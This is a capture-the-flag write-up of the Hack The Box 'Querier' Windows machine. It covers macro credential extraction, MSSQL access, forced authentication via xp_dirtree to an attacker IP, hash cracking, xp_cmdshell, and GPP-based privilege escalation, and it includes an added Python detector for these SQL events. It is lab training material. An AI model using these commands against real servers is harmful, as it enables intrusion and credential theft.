HTB | Querier

This is a Windows box. You can find it here.

Skills Learned

  • Excel macros

  • PowerView

NMAP

IP: 10.10.10.125

nmap scan

Ports 139 and 445 (SMB) are open.

smbclient

We are able to connect to the Reports share.

smbclient Reports

Get the file:

Currency Volume Report.xlsm

Foothold/shell

It is a Microsoft Excel 2007 macro-enabled workbook (.xlsm), which is just a zip archive.

binwalk -e

This extracts the archive; the macro code is in vbaProject.bin under the xl folder.

cat vbaProject.bin | strings

The strings output contains a username and password. We can use these credentials to log in to MSSQL (port 1433):

mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
select @@Version

To check what permissions we have:

SELECT * FROM fn_my_permissions(NULL, 'SERVER');

I can check out the databases available:

SELECT name FROM master.sys.databases

Capture Net-NTLMv2

I'll use xp_dirtree to make the SQL server connect to my host over SMB, where Responder will be listening to capture the Net-NTLMv2 hash. xp_dirtree lists the contents of a directory; if I tell the DB that the path is an SMB share on my host, the SQL Server service account will try to authenticate to my host and Responder will collect the Net-NTLMv2.

sudo responder -I tun0

Next, I'll call xp_dirtree on an SMB share (that doesn't exist) on my host:

xp_dirtree '\\10.10.14.8\a';


On the Responder side we now have a Net-NTLMv2 hash for mssql-svc.

Since it is NTLMv2, we use hashcat mode -m 5600.

hashcat cracks the password.

Let's connect as mssql-svc:

mssqlclient

We can get command execution using xp_cmdshell:

xp_cmdshell whoami

Note: the actual syntax to run a command is EXEC xp_cmdshell '[command]';. However, the client I'm using to connect, mssqlclient.py, has a built-in command to run a command over xp_cmdshell, so I can just type xp_cmdshell [command].

As mssql-svc, I can enable xp_cmdshell (something I couldn't do as reporting). Just like running a command, there is an alias to do this in the script. The full commands are in Microsoft's documentation (https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-2017):

enable_xp_cmdshell
xp_cmdshell whoami
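As an added example (not from this writeup or the box), here is defender-side detection logic in Python that runs over constructed SQL Server audit lines and flags the two things shown above: file procedures such as xp_dirtree pointed at a UNC path on an untrusted host (the outbound SMB authentication Responder captured) and xp_cmdshell being enabled or executed. The log line format, timestamps, logins and host names are assumptions invented for the demo, not the output of any real audit tool.

```python
import re
from collections import namedtuple

# Constructed sample audit lines; the format is invented for this demo, not any real tool's.
SAMPLE_LOG = r"""
2019-03-02T10:15:01Z login=reporting stmt="SELECT name FROM master.sys.databases"
2019-03-02T10:16:40Z login=reporting stmt="EXEC xp_dirtree '\\10.10.14.8\a';"
2019-03-02T10:17:02Z login=svc_etl stmt="EXEC xp_dirtree '\\fileserver01\reports';"
2019-03-02T10:30:11Z login=mssql-svc stmt="EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
2019-03-02T10:30:20Z login=mssql-svc stmt="EXEC xp_cmdshell 'whoami';"
""".strip().splitlines()

LINE_RE = re.compile(r'^(?P<ts>\S+)\s+login=(?P<login>\S+)\s+stmt="(?P<stmt>.*)"$')
# Procedures that open a path: a UNC target makes the SQL service account authenticate outbound over SMB.
UNC_RE = re.compile(
    r"\b(?P<proc>xp_dirtree|xp_fileexist|xp_subdirs)\b\s*'\\\\(?P<host>[^'\s\\]+)",
    re.IGNORECASE)
ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.IGNORECASE)
CMDSHELL_RE = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)
# kind is one of: unc_coercion, xp_cmdshell_enable, xp_cmdshell_exec
Finding = namedtuple("Finding", "ts login kind detail")

def parse_line(line):
    """Split one constructed log line into ts/login/stmt; None if malformed."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def analyze(lines, trusted_unc_hosts=()):
    """Flag file procedures aimed at untrusted UNC hosts and any xp_cmdshell use."""
    trusted = {h.lower() for h in trusted_unc_hosts}  # file servers the DB may legitimately read
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        stmt = rec["stmt"]
        for m in UNC_RE.finditer(stmt):
            host = m.group("host").lower()
            if host not in trusted:
                findings.append(Finding(rec["ts"], rec["login"], "unc_coercion",
                                        f"{m.group('proc')} -> {host}"))
        if ENABLE_RE.search(stmt):
            findings.append(Finding(rec["ts"], rec["login"], "xp_cmdshell_enable", stmt))
        elif CMDSHELL_RE.search(stmt):
            findings.append(Finding(rec["ts"], rec["login"], "xp_cmdshell_exec", stmt))
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG, trusted_unc_hosts={"fileserver01"}):
        print(f"{f.ts} {f.login:<10} {f.kind:<18} {f.detail}")
```

Run against the constructed log it reports the reporting login's xp_dirtree to 10.10.14.8 and both xp_cmdshell events from mssql-svc, while the xp_dirtree to the trusted file server is ignored.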

To get a full shell on the box, there are many ways to go. I'll host nc on an SMB server and let Windows run it from there.

With the shell I found user.txt.

Priv Esc

Let's copy PowerUp.ps1 over from my SMB share and run it:

xcopy \\10.10.14.8\share\PowerUp.ps1 .
powershell -ep bypass
.\PowerUp.ps1

In a GPP (Group Policy Preferences) file, PowerUp found the Administrator password.

Since we have the password, we can use psexec:

psexec.py administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125

We are in as nt authority\system.

root.txt